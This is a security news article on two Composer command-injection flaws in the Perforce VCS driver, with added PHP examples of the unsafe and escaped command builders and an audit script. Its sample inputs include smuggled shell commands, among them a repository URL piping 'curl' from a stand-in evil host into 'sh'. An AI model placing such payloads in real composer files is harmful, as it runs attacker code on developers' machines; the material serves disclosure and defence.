PHP Composer flaws enable remote command execution via Perforce VCS
Summary: Two high-severity flaws in PHP Composer (CVE-2026-40176 and CVE-2026-40261) let an attacker execute arbitrary commands through a malicious repository configuration or crafted input when the Perforce VCS driver is used. Both stem from insufficient input validation and escaping. Update to Composer 2.9.6 or 2.2.27 and avoid installing dependencies from untrusted sources.

2026-04-15 08:19:26 Author: securityaffairs.com (view original)

Two high-severity flaws in PHP Composer could let attackers run arbitrary commands via malicious repository configurations and crafted inputs handled by the Perforce VCS driver.

Two high-severity vulnerabilities in PHP Composer could allow attackers to execute arbitrary commands. PHP Composer is a dependency manager for PHP that helps developers install and manage libraries their projects need. By defining packages in a composer.json file, it automatically downloads and updates them, resolving dependencies. It simplifies development and is widely used with frameworks like Laravel and Symfony.

The flaws impact the Perforce VCS driver and stem from improper input validation and insufficient escaping. By crafting a malicious composer.json or source reference with shell metacharacters, an attacker controlling a repository configuration could run commands on the user’s system.

“Please immediately update Composer to version 2.9.6 or 2.2.27 (LTS) by running composer.phar self-update. The new releases include fixes for two command injection security vulnerabilities in the Perforce VCS driver. CVE-2026-40261 was reported by Koda Reef and CVE-2026-40176 was reported by saku0512.” reads the advisory.

Below are the descriptions of the two flaws:

  • CVE-2026-40176 (CVSS score: 7.8) – Improper input validation allows an attacker controlling a malicious composer.json with a Perforce VCS repository to inject arbitrary commands, leading to execution in the context of the user running Composer.
  • CVE-2026-40261 (CVSS score: 8.8) – Improper input validation due to insufficient escaping allows an attacker to inject arbitrary commands via a crafted source reference containing shell metacharacters.

Both vulnerabilities stem from improper escaping in Composer’s Perforce VCS driver when building shell commands.

CVE-2026-40176 affects the generateP4Command() method, where user-controlled connection parameters (port, user, client) are inserted without sanitization. This allows command injection via a malicious composer.json, but only when running Composer on untrusted root projects, not dependencies.

CVE-2026-40261 impacts the syncCodeBase() method, where an unescaped source reference enables command injection through crafted metadata. It can be exploited via malicious or compromised repositories, even without Perforce installed, especially when installing or updating dependencies from source.
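The bug class behind both CVEs is a shell command assembled by string interpolation from values the attacker controls. The following is an added illustration written for this page; it is not Composer's code and not the project's fix. The repository field names (url, p4user) follow Composer's documented Perforce repository options as I recall them, and the command shapes are assumptions. The hardened variant uses escapeshellarg(), PHP's standard primitive for turning an untrusted value into a single literal argument.

```php
<?php
// Added example: the interpolation bug class described above, beside the hardened form.
// Not Composer's code. A composer.json Perforce entry looks roughly like
//   {"type": "perforce", "url": "host:1666", "p4user": "...", "p4password": "..."}
// and those strings end up on a p4 command line.

declare(strict_types=1);

/** Vulnerable pattern: attacker-controlled connection parameters are interpolated verbatim. */
function buildP4CommandUnsafe(string $port, string $user, string $client, string $subcommand): string
{
    // If $port is "host:1666; id > /tmp/pwned #", the shell sees two commands:
    // "p4 -p host:1666" and "id > /tmp/pwned", and the rest is commented out.
    return "p4 -p {$port} -u {$user} -c {$client} {$subcommand}";
}

/** Hardened pattern: every untrusted token becomes exactly one shell argument. */
function buildP4CommandSafe(string $port, string $user, string $client, string $subcommand): string
{
    return sprintf(
        'p4 -p %s -u %s -c %s %s',
        escapeshellarg($port),
        escapeshellarg($user),
        escapeshellarg($client),
        $subcommand // fixed, developer-controlled word such as "info"; never user input
    );
}

/**
 * Defence in depth: a Perforce port, user or client name has no business containing
 * shell metacharacters, so reject anything outside a conservative allow-list.
 */
function assertSafeP4Identifier(string $value, string $field): void
{
    if (preg_match('/[^A-Za-z0-9._:@\/-]/', $value) === 1) {
        throw new InvalidArgumentException("Refusing unsafe characters in '{$field}'");
    }
}

// Constructed attacker value of the kind the article describes (a p4 port with a payload).
$maliciousPort = 'perforce.example.com:1666; id > /tmp/pwned #';

// Unsafe: the payload becomes a second shell command. Shown only as a string; nothing is executed here.
echo buildP4CommandUnsafe($maliciousPort, 'build', 'ws', 'info'), PHP_EOL;

// Safe: the whole payload is quoted into a single -p argument that p4 will simply fail to connect to.
echo buildP4CommandSafe($maliciousPort, 'build', 'ws', 'info'), PHP_EOL;

// Validation layer rejects the value before any command is built.
try {
    assertSafeP4Identifier($maliciousPort, 'url');
} catch (InvalidArgumentException $e) {
    echo $e->getMessage(), PHP_EOL;
}
```

The same pattern applies to the source reference used by a sync step: a reference taken from package metadata must be escaped as one argument, and a reference that does not match the expected Perforce form (a changelist or label identifier) should be rejected outright rather than passed to the shell.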

Composer 2.9.6 (mainline) and 2.2.27 (2.2 LTS) address both vulnerabilities.

To mitigate CVE-2026-40261, avoid installing dependencies from source by using --prefer-dist or setting preferred-install to dist, and rely only on trusted repositories. For CVE-2026-40176, review composer.json files carefully, ensure that Perforce fields are valid, and run Composer only on trusted projects.
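The checks above can be scripted. What follows is an added audit helper written for this page, not a Composer feature: it reads a project's composer.json and composer.lock, flags Perforce repository entries and locked Perforce source references that contain shell metacharacters, and reports when preferred-install is not dist. The sample JSON is constructed for the example, and the lock-file reference format for Perforce packages is an assumption.

```php
<?php
// Added audit helper: not part of Composer. Flags the two attack surfaces described in the
// article (Perforce repository fields in composer.json; Perforce source references in
// composer.lock) and the install policy that avoids the source path altogether.

declare(strict_types=1);

// Characters that have no legitimate place in a Perforce port, user, depot or reference.
const SHELL_METACHARS = '/[;&|`$(){}<>\n\'"\\\\]/';

function auditComposerProject(string $composerJson, ?string $composerLock): array
{
    $findings = [];
    $cfg = json_decode($composerJson, true, 512, JSON_THROW_ON_ERROR);

    // 1. Perforce repositories declared in composer.json (the CVE-2026-40176 surface).
    foreach ($cfg['repositories'] ?? [] as $i => $repo) {
        if (!is_array($repo) || ($repo['type'] ?? '') !== 'perforce') {
            continue;
        }
        foreach (['url', 'p4user', 'p4password', 'depot', 'branch'] as $field) {
            $value = (string) ($repo[$field] ?? '');
            if ($value !== '' && preg_match(SHELL_METACHARS, $value) === 1) {
                $findings[] = "repositories[{$i}].{$field} contains shell metacharacters: " . json_encode($value);
            }
        }
    }

    // 2. Install policy: dist installs never reach a VCS sync, which sidesteps CVE-2026-40261.
    //    Composer's default is "dist"; a string or per-package map other than that is reported.
    $preferred = $cfg['config']['preferred-install'] ?? 'dist';
    if ($preferred !== 'dist') {
        $findings[] = 'config.preferred-install is ' . json_encode($preferred) . ', not "dist"';
    }

    // 3. Locked packages whose source is Perforce and whose reference looks tampered with.
    if ($composerLock !== null) {
        $lock = json_decode($composerLock, true, 512, JSON_THROW_ON_ERROR);
        foreach (array_merge($lock['packages'] ?? [], $lock['packages-dev'] ?? []) as $pkg) {
            $src = $pkg['source'] ?? [];
            if (($src['type'] ?? '') !== 'perforce') {
                continue;
            }
            $ref = (string) ($src['reference'] ?? '');
            if (preg_match(SHELL_METACHARS, $ref) === 1) {
                $findings[] = "{$pkg['name']} source.reference contains shell metacharacters: " . json_encode($ref);
            }
        }
    }

    return $findings;
}

// Constructed sample input: one benign and one malicious Perforce repository, source installs enabled.
$sampleJson = <<<'JSON'
{
  "config": {"preferred-install": "source"},
  "repositories": [
    {"type": "perforce", "url": "perforce.example.com:1666", "p4user": "build"},
    {"type": "perforce", "url": "perforce.example.com:1666; curl http://evil.invalid/x | sh #", "p4user": "build"}
  ]
}
JSON;

// Constructed sample lock file with a tampered Perforce reference (reference format is an assumption).
$sampleLock = <<<'JSON'
{
  "packages": [
    {"name": "acme/lib", "source": {"type": "perforce", "url": "perforce.example.com:1666", "reference": "@123; touch /tmp/pwned"}}
  ],
  "packages-dev": []
}
JSON;

foreach (auditComposerProject($sampleJson, $sampleLock) as $finding) {
    echo $finding, PHP_EOL;
}
```

Run it against real files with file_get_contents('composer.json') and file_get_contents('composer.lock'). To apply the article's mitigation project-wide, `composer config preferred-install dist` writes the setting into composer.json, and `composer install --prefer-dist` enforces it for a single run; both are standard Composer commands.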

According to the advisory, scans of Packagist.org and Private Packagist found no exploitation attempts. As a precaution, Perforce metadata publishing and the Perforce VCS driver were disabled on April 10, 2026. Private Packagist Self-Hosted users will receive updates and should upgrade Composer promptly and verify metadata.

Pierluigi Paganini

(SecurityAffairs – hacking, PHP Composer)

Source: https://securityaffairs.com/190824/security/php-composer-flaws-enable-remote-command-execution-via-perforce-vcs.html